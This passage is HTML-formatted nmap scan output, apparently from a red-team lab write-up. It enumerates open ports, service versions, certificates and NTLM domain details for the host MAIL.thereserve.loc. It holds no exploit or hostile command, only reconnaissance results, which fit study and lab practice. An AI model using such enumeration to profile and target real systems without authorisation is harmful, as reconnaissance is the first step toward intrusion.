#F78C6C\">65513<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">closed<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ports<\/span><span style=\"color: #BABED8\"> (conn-refused)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for_Windows_7.7<\/span><span style=\"color: #BABED8\"> (protocol <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">2048<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">f3:6c:52:d2:7f:e9:0e:1c:c1:c7:ac:96:2c:d1:ec:2d<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">c2:56:3c:ed:c4:b0:69:a8:e7:ad:3c:31:05:05:e9:85<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">d3:e5:f0:73:75:d5:20:d9:c0:bb:41:99:e7:af:a0:00<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">25\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">smtp<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">hMailServer<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">smtpd<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smtp-commands:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SIZE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">20480000<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AUTH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LOGIN,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HELP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">211<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DATA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HELO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">EHLO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">NOOP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">QUIT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RCPT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RSET<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SAML<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TURN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VRFY<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">80\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IIS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">http-methods:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Potentially<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">risky<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">methods:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TRACE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft-IIS\/10.0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">403<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Forbidden:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Access<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">denied.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">110\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">pop3<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">hMailServer<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">pop3d<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_pop3-capabilities:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">USER<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">UIDL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TOP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">135\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">139\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">143\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">imap<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">hMailServer<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">imapd<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_imap-capabilities:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">NAMESPACE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IDLE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">completed<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CAPABILITY<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IMAP4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SORT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">QUOTA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CHILDREN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RIGHTS=texkA0001<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ACL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OK<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IMAP4rev1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">445\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">microsoft-ds?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">587\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">smtp<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">hMailServer<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">smtpd<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smtp-commands:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SIZE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">20480000<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AUTH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LOGIN,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HELP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">211<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DATA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HELO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">EHLO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">NOOP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">QUIT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RCPT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RSET<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SAML<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TURN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VRFY<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3306\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">mysql<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">MySQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8.0<\/span><span style=\"color: #C3E88D\">.31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssl-cert:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commonName=MySQL_Server_8.0.31_Auto_Generated_Server_Certificate<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">before:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-01-10T07:46:11<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">after:<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2033<\/span><span style=\"color: #C3E88D\">-01-07T07:46:11<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_ssl-date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TLS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">randomness<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">does<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">represent<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">time<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">mysql-info:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Protocol:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8.0<\/span><span style=\"color: #C3E88D\">.31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Thread<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ID:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">83<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Capabilities<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">flags:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">65535<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Some<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Capabilities:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SwitchToSSLAfterHandshake,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Speaks41ProtocolNew,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsCompression,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Speaks41ProtocolOld,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsTransactions,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">InteractiveClient,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IgnoreSpaceBeforeParenthesis,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ODBCClient,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FoundRows,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IgnoreSigpipes,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Support41Auth,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DontAllowDatabaseTableColumn,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsLoadDataLocal,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LongColumnFlag,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LongPassword,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ConnectWithDatabase,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsMultipleResults,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsAuthPlugins,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsMultipleStatments<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Status:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Autocommit<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Salt:<\/span><span style=\"color: #BABED8\"> \\x<\/span><span style=\"color: #C3E88D\">0D<\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #FFCB6B\">QZ\\x10\\x05:S\\x0Bl]-b\\x0E7\\x1C,\\8\\x1D<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Auth<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Plugin<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">caching_sha2_password<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3389\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ms-wbt-server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Terminal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Services<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">rdp-ntlm-info:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Target_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">THERESERVE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Domain_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">THERESERVE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Computer_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Domain_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Computer_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Tree_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Product_Version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.0<\/span><span style=\"color: #C3E88D\">.17763<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">System_Time:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T17:42:18+00:00<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssl-cert:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commonName=MAIL.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">before:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-04T20:25:58<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">after:<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-08-05T20:25:58<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_ssl-date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T17:42:28+00:00<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">-1s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">from<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scanner<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">time.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">5985\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTTPAPI<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\"> (SSDP\/UPnP)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft-HTTPAPI\/2.0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">33060\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">mysqlx?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">fingerprint-strings:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNSStatusRequestTCP,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LDAPSearchReq,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">NotesRPC,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SSLSessionReq,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TLSSessionReq,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">X11Probe:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #FFCB6B\">Invalid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">message<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">|     HY000<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">|   oracle-tns: <\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">|     Invalid message-frame.<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">HY000<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">47001\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTTPAPI<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\"> (SSDP\/UPnP)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft-HTTPAPI\/2.0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49664\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: 